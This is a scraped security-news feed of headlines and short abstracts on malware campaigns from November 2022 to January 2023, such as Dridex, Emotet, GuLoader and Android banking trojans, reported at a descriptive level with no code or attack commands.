A variant of the infamous Dridex banking malware has set its sights on Apple's macOS operating system using a previously undocumented infection method, according to latest research. It has "adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files," Trend Micro researcher Armando Nathaniel Pedragoza said in a technical report. Dridex , also called Bugat and Cridex, is an information stealer that's known to harvest sensitive data from infected machines and deliver and execute malicious modules. It's attributed to an e-crime group known as Evil Corp (aka Indrik Spider). The malware is also considered to be a successor of Gameover Zeus , itself a follow-up to another banking trojan called Zeus. Previous Dridex campaigns targeting Windows have leveraged macro-enabled Microsoft Excel documents sent via phishing emails to deploy the payload. Trend Micro's aThe Hacker News
January 6, 2023
Dridex Returns With New Variant, Targets MacOS Using New Entry Method Full Text
Abstract
The variant analyzed by Trend Micro has made its way into the MacOS platform and has adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files.Cyware
January 5, 2023
Shc-based Linux Malware Used to Install XMRig Miner Full Text
Abstract
The ASEC analysis team uncovered a new shell script compiler (shc)-based Linux malware dropping XMRig miner on compromised systems. The hackers pulled off the attack through a dictionary attack on mismanaged Linux SSH servers. An attack chain spotted in the campaign included both the shc downloader ... Read MoreCyware
January 05,2023
SpyNote Strikes Again: Android Spyware Targeting Financial Institutions Full Text
Abstract
Financial institutions are being targeted by a new version of Android malware called SpyNote at least since October 2022. "The reason behind this increase is that the developer of the spyware, who was previously selling it to other actors, made the source code public," ThreatFabric said in a report shared with The Hacker News. "This has helped other actors [in] developing and distributing the spyware, often also targeting banking institutions." Some of the notable institutions that are impersonated by the malware include Deutsche Bank, HSBC U.K., Kotak Mahindra Bank, and Nubank. SpyNote (aka SpyMax) is feature-rich and comes with a plethora of capabilities that allow it to install arbitrary apps; gather SMS messages, calls, videos, and audio recordings; track GPS locations; and even hinder efforts to uninstall the app. It also follows the modus operandi of other banking malware by requesting for permissions to accessibility services to extract two-factoThe Hacker News
January 05,2023
The Evolving Tactics of Vidar Stealer: From Phishing Emails to Social Media Full Text
Abstract
The notorious information-stealer known as Vidar is continuing to leverage popular social media services such as TikTok, Telegram, Steam, and Mastodon as an intermediate command-and-control (C2) server. "When a user creates an account on an online platform, a unique account page that can be accessed by anyone is generated," AhnLab Security Emergency Response Center (ASEC) disclosed in a technical analysis published late last month. "Threat actors write identifying characters and the C2 address in parts of this page." In other words, the technique relies on actor-controlled throwaway accounts created on social media to retrieve the C2 address. An advantage to this approach is that should the C2 server be taken down or blocked, the adversary can trivially get around the restrictions by setting up a new server and editing the account pages to allow the previously distributed malware to communicate with the server. Vidar, first identified in 2018, is a commerThe Hacker News
January 04,2023
New shc-based Linux Malware Targeting Systems with Cryptocurrency Miner Full Text
Abstract
A new Linux malware developed using the shell script compiler ( shc ) has been observed deploying a cryptocurrency miner on compromised systems. "It is presumed that after successful authentication through a dictionary attack on inadequately managed Linux SSH servers, various malware were installed on the target system," AhnLab Security Emergency Response Center (ASEC) said in a report published today. shc allows shell scripts to be converted directly into binaries, offering protections against unauthorized source code modifications. It's analogous to the BAT2EXE utility in Windows that's used to convert any batch file to an executable. In an attack chain detailed by the South Korean cybersecurity firm, a successful compromise of the SSH server leads to the deployment of an shc downloader malware along with a Perl-based DDoS IRC Bot. The shc downloader subsequently proceeds to fetch the XMRig miner software to mine cryptocurrency, with the IRC bot capable oThe Hacker News
January 4, 2023
New shc Linux Malware used to deploy CoinMiner Full Text
Abstract
Researchers discovered a new Linux malware developed with the shell script compiler (shc) that was used to deliver a cryptocurrency miner. The ASEC analysis team recently discovered that a Linux malware developed with shell script compiler (shc) that...Security Affairs
January 03,2023
Raspberry Robin Worm Evolves to Attack Financial and Insurance Sectors in Europe Full Text
Abstract
Financial and insurance sectors in Europe have been targeted by the Raspberry Robin worm, as the malware continues to evolve its post-exploitation capabilities while remaining under the radar. "What is unique about the malware is that it is heavily obfuscated and highly complex to statically disassemble," Security Joes said in a new report published Monday. The intrusions, observed against Spanish and Portuguese-speaking organizations, are notable for collecting more victim machine data than previously documented, with the malware now exhibiting sophisticated techniques to resist analysis. Raspberry Robin, also called QNAP worm, is being used by several threat actors as a means to gain a foothold into target networks. Spread via infected USB drives and other methods, the framework has been recently put to use in attacks aimed at telecom and government sectors. Microsoft is tracking the operators of Raspberry Robin under the moniker DEV-0856 . Security Joes' fThe Hacker News
January 3, 2023
BitRAT campaign relies on stolen sensitive bank data as a lure Full Text
Abstract
Experts warn of a new malware campaign using sensitive information stolen from a bank as a lure to spread the remote access trojan BitRAT. Qualys experts spotted a new malware campaign spreading a remote access trojan called BitRAT using sensitive...Security Affairs
January 2, 2023
WordPress Security Alert: New Linux Malware Exploiting Over Two Dozen CMS Flaws Full Text
Abstract
WordPress sites are being targeted by a previously unknown strain of Linux malware that exploits flaws in over two dozen plugins and themes to compromise vulnerable systems. "If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted web pages are injected with malicious JavaScripts," Russian security vendor Doctor Web said in a report published last week. "As a result, when users click on any area of an attacked page, they are redirected to other sites." The attacks involve weaponizing a list of known security vulnerabilities in 19 different plugins and themes that are likely installed on a WordPress site, using it to deploy an implant that can target a specific website to further expand the network. It's also capable of injecting JavaScript code retrieved from a remote server in order to redirect the site visitors to an arbitrary website of the attacker's choice. Doctor Web said it identified a second version of the backdoorThe Hacker News
December 30, 2022
New Linux malware targets WordPress sites by exploiting 30 bugs Full Text
Abstract
A new Linux malware has been exploiting 30 vulnerabilities in outdated WordPress plugins and themes to deploy malicious JavaScripts. Doctor Web researchers discovered a Linux malware, tracked as Linux.BackDoor.WordPressExploit.1, that compromises...Security Affairs
December 30, 2022
Google Ads Abused to Spread Malware Full Text
Abstract
Different malware operators are increasingly abusing the Google Ads platform to drop malware, including variants of Raccoon Stealer and the IcedID botnet. Threat actors clone the official websites of popular software to lure users into downloading their malicious versions.Cyware
December 29, 2022
Lazarus’s Subgroup BlueNoroff Adopts New Malware Delivery Method Full Text
Abstract
The financially motivated BlueNoroff group was found using a new malware strain to target financial institutions in Japan. The gang has also devised a new tactic to evade Mark-of-the-Web (MotW) security measures. Kaspersky researchers discovered more than 70 domains used by BlueNoroff. These ... Read MoreCyware
December 29, 2022
GuLoader Uses New Anti-Analysis Techniques to Evade Security Software Full Text
Abstract
GuLoader has been updated with new anti-evasion techniques to dodge traditional security solutions. The new version is also hostile to systems running virtual machines. The malware scans entire process memory for any virtual machine-related strings to thwart researchers and hostile virtualized env ... Read MoreCyware
December 27, 2022
Malware Disguised as YouTube Bot Steals Sensitive Data Full Text
Abstract
Threat actors are distributing a new YouTube bot malware that can artificially boost the rankings of videos on YouTube and steal sensitive information from browsers. Upon execution, the malware performs an AntiVM check to prevent malware detection and analysis by researchers in a virtual envi ... Read MoreCyware
December 27, 2022
Uncovering the link between PrivateLoader PPI service and RisePro stealer Full Text
Abstract
The pay-per-install (PPI) malware downloader service PrivateLoader is being used to distribute the RisePro info-stealing malware. The pay-per-install (PPI) malware downloader service PrivateLoader is being used to distribute the information-stealing...Security Affairs
December 26, 2022
GuLoader implements new evasion techniques Full Text
Abstract
Cybersecurity researchers exposed new evasion techniques adopted by an advanced malware downloader called GuLoader. CrowdStrike researchers d a detailed multiple evasion techniques implemented by an advanced malware downloader called GuLoader (aka...Security Affairs
December 26, 2022
GuLoader implements new evasion techniques Full Text
Abstract
Cybersecurity researchers exposed new evasion techniques adopted by an advanced malware downloader called GuLoader. CrowdStrike researchers d a detailed multiple evasion techniques implemented by an advanced malware downloader called GuLoader (aka...Security Affairs
December 24, 2022
New info-stealer malware infects software pirates via fake cracks sites Full Text
Abstract
A new information-stealing malware named 'RisePro' is being distributed through fake cracks sites operated by the PrivateLoader pay-per-install (PPI) malware distribution service.BleepingComputer
December 24, 2022
Raspberry Robin malware used in attacks against Telecom and Governments Full Text
Abstract
The Raspberry Robin worm attacks aimed at telecommunications and government office systems across Latin America, Australia, and Europe. Researchers from Trend Micro have uncovered a Raspberry Robin worm campaign targeting telecommunications and government...Security Affairs
December 22, 2022
Beyond ProxyNotShell - New OWASSRF Exploit Targets MS Exchange Full Text
Abstract
Security analysts at CrowdStrike reported a new exploit method called OWASSRF that requires a hacker to abuse ProxyNotShell flaws (CVE-2022-41080 and CVE-2022-41082) in Microsoft Exchange servers. Through this, an attacker can pull off RCE attacks via Outlook Web Access (OWA). A deeper study into i ... Read MoreCyware
December 21, 2022
Info-stealers Used to Target Ukraine’s Military Systems Full Text
Abstract
Ukraine’s DELTA military system users were the target of a phishing attack that distributed infostealers identified as FateGrab and StealDeal. Email and instant messages with fake warnings to update the Delta certificates were used to lure victims. Upon execution, StealDeal and FateGrab malware wo ... Read MoreCyware
December 21, 2022
Zerobot malware now spreads by exploiting Apache vulnerabilities Full Text
Abstract
The Zerobot botnet has been upgraded to infect new devices by exploiting security vulnerabilities affecting Internet-exposed and unpatched Apache servers.BleepingComputer
December 21, 2022
GodFather Android malware targets 400 banks, crypto exchanges Full Text
Abstract
An Android banking malware named 'Godfather' has been targeting users in 16 countries, attempting to steal account credentials for over 400 online banking sites and cryptocurrency exchanges.BleepingComputer
December 20, 2022
Newly Identified RisePro Malware is a Spin-off of Vidar Stealer Full Text
Abstract
RisePro stealer malware has been found targeting sensitive information on infected systems and harvesting data in the form of logs. It may have been dropped or downloaded by the pay-per-install malware downloader service PrivateLoader, finds Flashpoint. The malware first appeared on a Russian forum ... Read MoreCyware
December 20, 2022
Raspberry Robin worm drops fake malware to confuse researchers Full Text
Abstract
The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools.BleepingComputer
December 20, 2022
Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware Full Text
Abstract
Researchers spotted a malicious package in the Python Package Index (PyPI) repository that impersonates a software development kit (SDK) for SentinelOne. Cybersecurity researchers at ReversingLabs have discovered a new malicious package, named 'SentinelOne,'...Security Affairs
December 19, 2022
Malicious ‘SentinelOne’ PyPI package steals data from developers Full Text
Abstract
Threat actors have published a malicious Python package on PyPI, named 'SentinelOne,' that pretends to be the legitimate SDK client for the trusted American cybersecurity firm but, in reality, steals data from developers.BleepingComputer
December 17, 2022
Glupteba malware is back in action after Google disruption Full Text
Abstract
The Glupteba malware botnet has sprung back into action, infecting devices worldwide after its operation was disrupted by Google almost a year ago.BleepingComputer
December 15, 2022
Hackers Use Microsoft-Signed Malicious Windows Drivers in Post-Exploitation Activity Full Text
Abstract
Microsoft revoked several hardware developer accounts after drivers signed through those profiles were leveraged by hackers in attacks, including ransomware incidents. Sophos revealed that Cuba ransomware operators used the BURNTCIGAR loader utility to install a malicious driver signed using Micros ... Read MoreCyware
December 15, 2022
Crooks use HTML smuggling to spread QBot malware via SVG files Full Text
Abstract
Talos researchers uncovered a phishing campaign distributing the QBot malware to Windows systems using SVG files. Talos researchers uncovered a phishing campaign distributing the QBot malware using a new technique that leverages Scalable Vector Graphics...Security Affairs
December 14, 2022
Attackers use SVG files to smuggle QBot malware onto Windows systems Full Text
Abstract
QBot malware phishing campaigns have adopted a new distribution method using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows.BleepingComputer
December 13, 2022
Microsoft-signed malicious Windows drivers used in ransomware attacks Full Text
Abstract
Microsoft has revoked several Microsoft hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents.BleepingComputer
December 13, 2022
TrueBot Malware Downloader Comes with Alternative Delivery Methods Full Text
Abstract
Russian-speaking hacking group Silence dropped the TrueBot malware downloader on over 1,500 systems worldwide to deploy their set of hacking tools, including Grace malware, Cobalt Strike, Teleport, and Cl0p ransomware. Teleport is a new custom data leakage tool created by the group. It uses Truebot ... Read MoreCyware
December 13, 2022
Drokbk Flying Under the Radar by using GitHub as Dead Drop Resolver Full Text
Abstract
A previously undocumented malware, dubbed Drokbk, was linked to an Iranian hacker group known as Nemesis Kitten (aka DEV-0270). The malware uses GitHub as a dead drop resolver to extract data from a compromised system or to receive commands. The malware is written in .NET and is deployed post-intru ... Read MoreCyware
December 13, 2022
Experts detailed a previously undetected VMware ESXi backdoor Full Text
Abstract
A new Python backdoor is targeting VMware ESXi servers, allowing attackers to take over compromised systems. Juniper Networks researchers spotted a previously undocumented Python backdoor targeting VMware ESXi servers. The researchers discovered the backdoor...Security Affairs
December 12, 2022
New Python malware backdoors VMware ESXi servers for remote access Full Text
Abstract
A previously undocumented Python backdoor targeting VMware ESXi servers has been spotted, enabling hackers to execute commands remotely on a compromised system.BleepingComputer
December 12, 2022
Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware Full Text
Abstract
On Friday, Phylum security researchers warned that a threat actor was typosquatting popular PyPI packages to direct developers to malicious dependencies containing code to download payloads written in Golang (Go).Cyware
December 8, 2022
Zombinder APK binding service used in multiple malware attacks Full Text
Abstract
Zombinder is a third-party service on darknet used to embed malicious payloads in legitimate Android applications. While investigating a new malware campaign targeting Android and Windows systems, researchers at Threat Fabric discovered a darknet...Security Affairs
December 8, 2022
Trojanized OneNote Document Leads to Formbook Malware Full Text
Abstract
Trustwave SpiderLabs’ researchers uncovered threat actors using a OneNote document to move Formbook malware, an information stealing trojan sold on an underground hacking forum since mid-2016 as malware-as-a-service.Cyware
December 08, 2022
New ‘Zombinder’ platform binds Android malware with legitimate apps Full Text
Abstract
A darknet platform dubbed 'Zombinder' allows threat actors to bind malware to legitimate Android apps, causing victims to infect themselves while still having the full functionality of the original app to evade suspicion.BleepingComputer
December 07, 2022
New Zerobot malware has 21 exploits for BIG-IP, Zyxel, D-Link devices Full Text
Abstract
A new Go-based malware named 'Zerobot' has been spotted in mid-November using exploits for almost two dozen vulnerabilities in a variety of devices that include F5 BIG-IP, Zyxel firewalls, Totolink and D-Link routers, and Hikvision cameras.BleepingComputer
December 07, 2022
Hackers use new Fantasy data wiper in coordinated supply chain attack Full Text
Abstract
The Iranian Agrius APT hacking group is using a new 'Fantasy' data wiper in supply-chain attacks impacting organizations in Israel, Hong Kong, and South Africa.BleepingComputer
December 6, 2022
Ransomware Toolkit Cryptonite turning into an accidental wiper Full Text
Abstract
Researchers spotted a version of the open-source ransomware toolkit Cryptonite that doesn't support decryption capabilities. Fortinet researchers discovered a sample of malware generated with the publicly available open-source ransomware toolkit...Security Affairs
December 5, 2022
Exclusive: The largest mobile malware marketplace identified by Resecurity in the Dark Web Full Text
Abstract
Resecurity has identified a new underground marketplace in the Dark Web oriented towards mobile malware developers and operators. "In the Box" dark web marketplace is leveraged by cybercriminals to attack over 300 financial institutions (FIs), payment...Security Affairs
December 5, 2022
Platform Certificates Used to Sign Android Malware Installers and Droppers Full Text
Abstract
Several platform certificates, belonging to LG Electronics, Revoview, Mediatek, and Samsung Electronics, were found being abused by threat actors to sign malicious Android apps. Google recommends vendors minimize the number of applications signed with the platform certificate to lower the cost of p ... Read MoreCyware
December 04, 2022
Android malware apps with 2 million installs spotted on Google Play Full Text
Abstract
A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them.BleepingComputer
December 4, 2022
New CryWiper wiper targets Russian entities masquerading as a ransomware Full Text
Abstract
Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor's offices and courts. Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive...Security Affairs
December 3, 2022
Schoolyard Bully Trojan Steals Facebook Credentials Full Text
Abstract
Schoolyard Bully Trojan, a new Android threat campaign, victimized over 300,000 users across 71 countries. The malware steals Facebook credentials pretending to be educational apps. Experts found 37 apps associated with this campaign and these are actively being distributed via third-party app stor ... Read MoreCyware
December 2, 2022
Wipers Are Widening: Here’s Why That Matters Full Text
Abstract
In the first half of this year, researchers saw a rising trend of wiper malware being deployed in parallel with the Russia-Ukraine war. However, those wipers haven’t stayed in one place – they’re emerging globally.Security Week
December 2, 2022
Android Keyboard Apps with 2 Million downloads can remotely hack your device Full Text
Abstract
Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone. Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively...Security Affairs
December 02, 2022
New CryWiper data wiper targets Russian courts, mayor’s offices Full Text
Abstract
A previously undocumented data wiper named CryWiper is masquerading as ransomware, extorting victims to pay for a decrypter, but in reality, it just destroys data beyond recovery.BleepingComputer
December 2, 2022
Archive files become preferred format for malware delivery Full Text
Abstract
The team at HP Wolf Security found that cybercriminals are using archive files as the preferred method for spreading malware, beating Microsoft Office for the first time.Tech Target
Dec 02, 2022
Watch Out! These Android Keyboard Apps With 2 Million Installs Can be Hacked Remotely Full Text
Abstract
Multiple unpatched vulnerabilities have been discovered in three Android apps that allow a smartphone to be used as a remote keyboard and mouse. The apps in question are Lazy Mouse , PC Keyboard , and Telepad , which have been cumulatively downloaded over two million times from the Google Play Store. Telepad is no longer available through the app marketplace but can be downloaded from its website. Lazy Mouse (com.ahmedaay.lazymouse2 and com.ahmedaay.lazymousepro) PC Keyboard (com.beapps.pckeyboard) Telepad (com.pinchtools.telepad) While these apps function by connecting to a server on a desktop and transmitting to it the mouse and keyboard events, the Synopsys Cybersecurity Research Center (CyRC) found as many as seven flaws related to weak or missing authentication, missing authorization, and insecure communication. The issues (from CVE-2022-45477 through CVE-2022-45483), in a nutshell, could be exploited by a malicious actor to execute arbitrary commands sans authenticatiThe Hacker News
Dec 01, 2022
Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, & Windows Zero-Days Full Text
Abstract
A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018. "Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device," Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up. Variston, which has a bare-bones website , claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support the "the discovery of digital information by [law enforcement agencies]," among other services. The vulnerabilities, which have been patched by Google, Microsoft, and Mozilla in 2021 and early 2022, are believed toThe Hacker News
Dec 01, 2022
Schoolyard Bully Trojan Apps Stole Facebook Credentials from Over 300,000 Android Users Full Text
Abstract
More than 300,000 users across 71 countries have been victimized by a new Android threat campaign called the Schoolyard Bully Trojan . Mainly designed to steal Facebook credentials, the malware is camouflaged as legitimate education-themed applications to lure unsuspecting users into downloading them. The apps, which were available for download from the official Google Play Store, have now been taken down. That said, they still continue to be available on third-party app stores. "This trojan uses JavaScript injection to steal the Facebook credentials," Zimperium researchers Nipun Gupta and Aazim Bill SE Yaswant said in a report shared with The Hacker News. It achieves this by launching Facebook's login page in a WebView, which also embeds within it malicious JavasCript code to exfiltrate the user's phone number, email address, and password to a configured command-and-control (C2) server. The Schoolyard Bully Trojan further makes use of native libraries suchThe Hacker News
December 01, 2022
Android malware infected 300,000 devices to steal Facebook accounts Full Text
Abstract
An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices.BleepingComputer
December 1, 2022
New Go-based Redigo malware targets Redis servers Full Text
Abstract
Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers. Threat...Security Affairs
December 01, 2022
New Redigo malware drops stealthy backdoor on Redis servers Full Text
Abstract
A new Go-based malware threat that researchers call Redigo has been targeting Redis servers vulnerable to CVE-2022-0543 to plant a stealthy backdoor and allow command execution.BleepingComputer
December 01, 2022
New DuckLogs malware service claims having thousands of ‘customers’ Full Text
Abstract
A new malware-as-a-service (MaaS) operation named 'DuckLogs' has emerged, giving low-skilled attackers easy access to multiple modules to steal information, log key strokes, access clipboard data, and remote access to the compromised host.BleepingComputer
December 1, 2022
ScarCruft’s New Dolphin Backdoor Uses Google Drive for C&C Communication Full Text
Abstract
The backdoor has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers.ESET Security
November 30, 2022
Google links three exploitation frameworks to Spanish commercial spyware vendor Variston Full Text
Abstract
Google’s Threat Analysis Group (TAG) linked three exploitation frameworks to a Spanish surveillance spyware vendor named Variston. While tracking the activities of commercial spyware vendors, Threat Analysis Group (TAG) spotted an exploitation framework...Security Affairs
November 30, 2022
This Malicious App Abused Hacked Devices to Create Fake Accounts on Multiple Platforms Full Text
Abstract
A malicious Android SMS application discovered on the Google Play Store has been found to stealthily harvest text messages with the goal of creating accounts on a wide range of platforms like Facebook, Google, and WhatsApp. The app, named Symoo (com.vanjan.sms), had over 100,000 downloads and functioned as a relay for transmitting messages to a server, which advertises an account creation service. This is achieved by using the phone numbers associated with the infected devices as a means to gather the one-time password that's typically sent to verify the user when setting up new accounts. "The malware asks the phone number of the user in the first screen," security researcher Maxime Ingrao, who discovered the malware, said , while also requesting for SMS permissions. "Then it pretends to load the application but remains all the time on this page, it is to hide the interface of the received SMS and that the user does not see the SMS of subscriptions to the vaThe Hacker News
November 30, 2022
New Windows malware scans victims’ mobile phones for data to steal Full Text
Abstract
Security researchers found a previously unknown backdoor they call Dophin that's been used by North Korean hackers in highly targeted operations for more than a year to steal files and send them to Google Drive storage.BleepingComputer
November 30, 2022
Android and iOS apps with 15 million installs extort loan seekers Full Text
Abstract
Over 280 Android and iOS apps on the Google Play and the Apple App stores trapped users in loan schemes with misleading terms and employed various methods to extort and harass borrowers.BleepingComputer
November 28, 2022
Malicious Android app found powering account creation service Full Text
Abstract
A fake Android SMS application, with 100,000 downloads on the Google Play store, has been discovered to secretly act as an SMS relay for an account creation service for sites like Microsoft, Google, Instagram, Telegram, and FacebookBleepingComputer
November 24, 2022
Docker Hub repositories hide over 1,650 malicious containers Full Text
Abstract
Over 1,600 publicly available Docker Hub images hide malicious behavior, including cryptocurrency miners, embedded secrets that can be used as backdoors, DNS hijackers, and website redirectors.BleepingComputer
November 24, 2022
Hackers modify popular OpenVPN Android app to include spyware Full Text
Abstract
A threat actor associated with cyberespionage operations since at least 2017 has been luring victims with fake VPN software for Android that is a trojanized version of legitimate software SoftVPN and OpenVPN.BleepingComputer
November 24, 2022
This Android File Manager App Infected Thousands of Devices with SharkBot Malware Full Text
Abstract
The Android banking fraud malware known as SharkBot has reared its head once again on the official Google Play Store, posing as file managers to bypass the app marketplace's restrictions. A majority of the users who downloaded the rogue apps are located in the U.K. and Italy, Romanian cybersecurity company Bitdefender said in an analysis published this week. SharkBot, first discovered towards the end of 2021 by Cleafy, is a recurring mobile threat distributed both on the Google Play Store and other third-party app stores. One of the trojan's primary goals is to initiate money transfers from compromised devices via a technique called "Automatic Transfer System" ( ATS ), in which a transaction triggered via a banking app is intercepted to swap the payee account with an actor-controlled account in the background. It's also capable of serving a fake login overlay when users attempt to open legitimate banking apps, stealing the credentials in the proceThe Hacker News
November 23, 2022
Ducktail Malware Operation Evolves with New Malicious Capabilities Full Text
Abstract
The operators of the Ducktail information stealer have demonstrated a "relentless willingness to persist" and continued to update their malware as part of an ongoing financially driven campaign. "The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account," WithSecure researcher Mohammad Kazem Hassan Nejad said in a new analysis. "The operation ultimately hijacks Facebook Business accounts to which the victim has sufficient access. The threat actor uses their gained access to run ads for monetary gain." Attributed to a Vietnamese threat actor, the Ducktail campaign is designed to target businesses in the digital marketing and advertising sectors which are active on the Facebook Ads and Business platform. Also targeted are individuals within prospective companies that are likely to have high-level access to Facebook Business accounts. This includesThe Hacker News
November 23, 2022
Ducktail information stealer continues to evolve Full Text
Abstract
The operators behind the Ducktail information stealer continue to improve their malicious code, operators experts warn. In late July 2022, researchers from WithSecure (formerly F-Secure Business) discovered an ongoing operation, named DUCKTAIL, that...Security Affairs
November 23, 2022
Nighthawk Likely to Become Hackers’ New Post-Exploitation Tool After Cobalt Strike Full Text
Abstract
A nascent and legitimate penetration testing framework known as Nighthawk is likely to gain threat actors' attention for its Cobalt Strike-like capabilities. Enterprise security firm Proofpoint said it detected the use of the software in mid-September 2022 with a number of test emails sent using generic subject lines such as "Just checking in" and "Hope this works2." However, there are no indications that a leaked or cracked version of Nighthawk is being weaponized by threat actors in the wild, Proofpoint researcher Alexander Rausch said in a write-up. Nighthawk, launched in December 2021 by a company called MDSec, is analogous to its counterparts Cobalt Strike , Sliver , and Brute Ratel , offering a red team toolset for adversary threat simulation. It's licensed for £7,500 (or $10,000) per user for a year. "Nighthawk is the most advanced and evasive command-and-control framework available on the market," MDSec notes . "Nighthawk iThe Hacker News
November 23, 2022
Backdoored Chrome extension installed by 200,000 Roblox players Full Text
Abstract
Chrome browser extension 'SearchBlox' installed by more than 200,000 users has been discovered to contain a backdoor that can steal your Roblox credentials as well as your assets on Rolimons, a Roblox trading platform.BleepingComputer
November 22, 2022
This Malware Installs Malicious Browser Extensions to Steal Users’ Passwords and Cryptos Full Text
Abstract
A malicious extension for Chromium-based web browsers has been observed to be distributed via a long-standing Windows information stealer called ViperSoftX . Czech-based cybersecurity company dubbed the rogue browser add-on VenomSoftX owing to its standalone features that enable it to access website visits, steal credentials and clipboard data, and even swap cryptocurrency addresses via an adversary-in-the-middle (AiTM) attack. ViperSoftX, which first came to light in February 2020, was characterized by Fortinet as a JavaScript-based remote access trojan and cryptocurrency stealer. The malware's use of a browser extension to advance its information-gathering goals was documented by Sophos threat analyst Colin Cowie earlier this year. "This multi-stage stealer exhibits interesting hiding capabilities, concealed as small PowerShell scripts on a single line in the middle of otherwise innocent-looking large log files, among others," Avast researcher Jan Rubín saidThe Hacker News
November 22, 2022
Android file manager apps infect thousands with Sharkbot malware Full Text
Abstract
A new collection of malicious Android apps posing as harmless file managers had infiltrated the official Google Play app store, infecting users with the Sharkbot banking trojan.BleepingComputer
November 22, 2022
Aurora Stealer Malware is becoming a prominent threat in the cybercrime ecosystem Full Text
Abstract
Researchers warn of threat actors employing a new Go-based malware dubbed Aurora Stealer in attacks in the wild. Aurora Stealer is an info-stealing malware that was first advertised on Russian-speaking underground forums in April 2022. Aurora was offered...Security Affairs
November 22, 2022
Emotet is back and delivers payloads like IcedID and Bumblebee Full Text
Abstract
The Emotet malware is back and experts warn of a high-volume malspam campaign delivering payloads like IcedID and Bumblebee. Proofpoint researchers warn of the return of the Emotet malware, in early November the experts observed a high-volume malspam...Security Affairs
November 21, 2022
Aurora infostealer malware increasingly adopted by cybergangs Full Text
Abstract
Cybercriminals are increasingly turning to a new Go-based information stealer named 'Aurora' to steal sensitive information from browsers and cryptocurrency apps, exfiltrate data directly from disks, and load additional payloads.BleepingComputer
November 21, 2022
Notorious Emotet Malware Returns With High-Volume Malspam Campaign Full Text
Abstract
The notorious Emotet malware has returned with renewed vigor as part of a high-volume malspam campaign designed to drop payloads like IcedID and Bumblebee . "Hundreds of thousands of emails per day" have been sent since early November 2022, enterprise security company Proofpoint said last week, adding, "the new activity suggests Emotet is returning to its full functionality acting as a delivery network for major malware families." Among the primary countries targeted are the U.S., the U.K., Japan, Germany, Italy, France, Spain, Mexico, and Brazil. The Emotet-related activity was last observed in July 2022, although sporadic infections have been reported since then. In mid-October, ESET revealed that Emotet may be readying for a new wave of attacks, pointing out updates to its "systeminfo" module. The malware, which is attributed to a threat actor known as Mummy Spider (aka Gold Crestwood or TA542), staged a revival of sorts late last yeaThe Hacker News
November 21, 2022
Google provides rules to detect tens of cracked versions of Cobalt Strike Full Text
Abstract
Researchers at Google Cloud identified 34 different hacked release versions of the Cobalt Strike tool in the wild. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine....Security Affairs
November 21, 2022
Google Identifies 34 Cracked Versions of Popular Cobalt Strike Hacking Toolkit in the Wild Full Text
Abstract
Google Cloud last week disclosed that it identified 34 different hacked release versions of the Cobalt Strike tool in the wild, the earliest of which shipped in November 2012. The versions, spanning 1.44 to 4.7, add up to a total of 275 unique JAR files, according to findings from the Google Cloud Threat Intelligence (GCTI) team. The latest version of Cobalt Strike is version 4.7.2. Cobalt Strike, developed by Fortra (née HelpSystems), is a popular adversarial framework used by red teams to simulate attack scenarios and test the resilience of their cyber defenses. It comprises a Team Server that acts as the command-and-control (C2) hub to remotely commandeer infected devices and a stager that's designed to deliver a next-stage payload called the Beacon, a fully-featured implant that reports back to the C2 server. Given its wide-ranging suite of features, unauthorized versions of the software have been increasingly weaponized by many a threat actor to advanceThe Hacker News
November 21, 2022
Google Chrome extension used to steal cryptocurrency, passwords Full Text
Abstract
An information-stealing Google Chrome browser extension named 'VenomSoftX' is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web.BleepingComputer
November 19, 2022
New improved versions of LodaRAT spotted in the wild Full Text
Abstract
Cisco Talos spotted multiple updated versions of LodaRAT that were deployed alongside other malware families, including RedLine and Neshta. Researchers from Cisco Talos have monitored the LodaRAT malware over the course of 2022 and recently discovered...Security Affairs
November 18, 2022
LodaRAT Malware Resurfaces with New Variants Employing Updated Functionalities Full Text
Abstract
The LodaRAT malware has resurfaced with new variants that are being deployed in conjunction with other sophisticated malware, such as RedLine Stealer and Neshta. "The ease of access to its source code makes LodaRAT an attractive tool for any threat actor who is interested in its capabilities," Cisco Talos researcher Chris Neal said in a write-up published Thursday. Aside from being dropped alongside other malware families, LodaRAT has also been observed being delivered through a previously unknown variant of another commodity trojan called Venom RAT , which has been codenamed S500. An AutoIT-based malware, LodaRAT (aka Nymeria ) is attributed to a group called Kasablanca and is capable of harvesting sensitive information from compromised machines. In February 2021, an Android version of the malware sprang forth as a way for the threat actors to expand their attack surface. Then in September 2022, Zscaler ThreatLabz uncovered a new delivery mechanism that involvedThe Hacker News
November 18, 2022
